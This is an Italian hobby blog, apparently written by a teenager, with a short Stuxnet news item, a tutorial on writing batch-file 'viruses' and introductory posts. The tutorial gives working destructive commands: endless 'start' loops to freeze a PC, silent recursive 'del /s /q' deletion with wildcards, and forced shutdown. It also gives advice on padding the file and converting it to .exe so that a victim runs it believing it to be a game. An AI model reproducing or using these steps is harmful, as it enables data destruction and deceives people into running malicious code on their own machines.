STUXNET è un worm nato per la riprogrammazione di sistemi di gestione di impianti industriali. A metà giugno 2010 la società VirusBlokAda ha segnalato la sua esistenza e l'inizio della sua progettazione è stato datato al giugno 2009. L'obbiettivo del virus potrebbero essere le centrali nucleari in costruzione in Iran. Tale virus, definito anche arma informatica, ha già contagiato oltre a numerosi computer iraniani, anche la Cina e l'Europa. Siemens ha messo a disposizione uno strumento per il rilevamento e la rimozione degli Stuxnet. Richiede inoltre agli utenti di evitare l'utilizzo di penne USB non sicure all'interno della rete anche successivamente alla rimozione del virus. Uno strumento gratuito per la rimozione di Stuxnet è messo a disposizione da BitDefender sul suo sito dedicato MalwareCity.com.

Download Source Code
Notizia su "The Hacker News"

Creare virus in batch

Ciao a tutti, oggi con il mio primo articolo desidero spiegare ai meno esperti di voi, come creare un "innoquo" virus in batch.

Allora iniziamo...

Il procedimento per creare un file batch è semplice:
- Create un documento di testo con il Blocco note
- Scriveteci il codice del vostro virus
- Fate "Salva con nome"  ----> <Nome che volete>.bat

A questo punto l'immagine del file dovrebbe essere un ingranaggio.

Impallare il pc 

Per impallare un pc aprite il file e scrivete:
start
start
start
start
start
start
...

Fatelo più volte possibile, ogni "start" aprirà una shell, quindi se volete che il pc sia impossibile da sbloccare vi consiglio di scriverlo almeno 50.000 volte, ovviamente con il copia e incolla :D. 
Un altro metodo che ho trovato consiste nel utilizzare due file che si aprono a vicenda all'infinito, e basterà scrivere start una sola volta.

Codice 1° file (1.bat):
start 2.bat
 
Codice 2° file (2.bat):
start 1.bat

Facile no? Ovviamente il nome del file deve corrispondere con il codice, ed entrambi i file devono risiedere nella stessa cartella.


Cancellare un file

Passiamo ora ad un comando più distruttivo, ovvero quello per cancellare un file:

@erase  /s /q "C:\...\...\*.*"
@del /s /q "C:\...\...\*.*"

I due comandi fanno esattamente la stessa cosa, ma analizziamoli meglio...

la "@" non visualizza il percorso del file, ossia non dice in quale cartella è presente quest'ultimo
ERASE e DEL sono i comandi che cancellano i file, mentre quelli
seguiti da "/" sono gli attributi dei comandi... Ecco un'elenco degli attributi
di questi due comandi

 /p Chiede conferma prima di eliminare ogni file.
 /f Forza l'eliminazione dei file di sola lettura.
 /s Elimina i file specificati da tutte le sottodirectory.
 /q Modalità silenziosa, non chiede conferma per eliminazioni globali.
 /a Seleziona i file da eliminare in base agli attributi.

Cosa significa il *.*?
Il primo asterisco indica che i file possono avere qualsiasi nome, mentre il secondo indica che possono avere qualsiasi formato. Se voglio cancellare tutti i file in formato txt mi basterà scrivere:

@del /s /q "C:\...\...\*.txt" 

Mi raccomando, ricordatevi le " " prima e dopo il percorso o windows non ve lo riconoscerà.

Spegnere il computer 

Il comando per spegnere il pc è shutdown, non sembra cosi pericoloso ma in certe circostanze potrebbe rivelarsi abbastanza bastardo.

shutdown  -f -t ..... -r

Il comando <-t .....> inIdica dopo quanto tempo il computer deve spegnersi. Questi sono i significati degli attributi: 

-i : attiva l’interfaccia utente grafica
-l :
effettua il logoff dell’utente.
-r :
riavvia il sistema
-s :
chiude la sessione di Windows (spegne il computer)
-t :
.... indica i secondi di attesa prima della chiusura di Windows
-f :
chiude le applicazioni ancora aperte
 

Appesantire i vostri virus

Appesantire il vostro virus è molto importante, chiunque con un po' di esperienza informatica si insospettirebbe nel vedere un file da 2kb... Il virus potrebbe essere somministrato sotto forma di un gioco, o qualcosa di simile. Per aumentare le dimensioni del vostro virus il comando è questo:

@rem ............................................................................................................

La scritta rem consiste nel creare commenti, e non influisce in nessun modo nel funzionamento del programma, per questo possiamo utilizzarlo per appesantire un file. Al posto dei ... dovete scrivere tante parole, non importa cosa, l'importante è che con copia e incolla lo copiate tante volte in modo da appesantire notevolmente il file.

Convertire da .bat in .exe  

Un file .bat, qualunque siano le dimensioni può sempre destare sospetto, per questo potrebbe essere utile convertirlo in .exe dato che la maggior parte degli eseguibili del programmi sono in questo formato. 
Un programma per la conversione è questo.  


Ho scritto questo articolo a solo scopo informativo, pertanto non mi ritengo responsabile delle vostre azioni.

FINE, spero di esservi stato utile. 



sabato 2 luglio 2011

Argomenti del blog

Gli argomenti che tratterò saranno molto vari...
Parleremo di scienza, di tecnologia, di hacking, di videogiochi, di notizie interessanti e tutto cio che vorrete, potrete farmi domande ed io (per chi ha fatto la domanda, e per tutti i lettori) mi impegnerò  a rispondere per quanto posso... mi raccomando non chiedetemi niente di storia o italiano altrimenti vi banno :D (NO SUL SERIO NON FATEMI FARE FIGURACCE xD)

Mi presento...

Ciao a tutti! Io sono Nico, ho 14 anni e vivo nelle marche. Ho creato questo blog per insegnare e per scoprire, e per conoscere nuove persone con cui fare due risate. Spero che il mio blog sarà di vostro piacimento.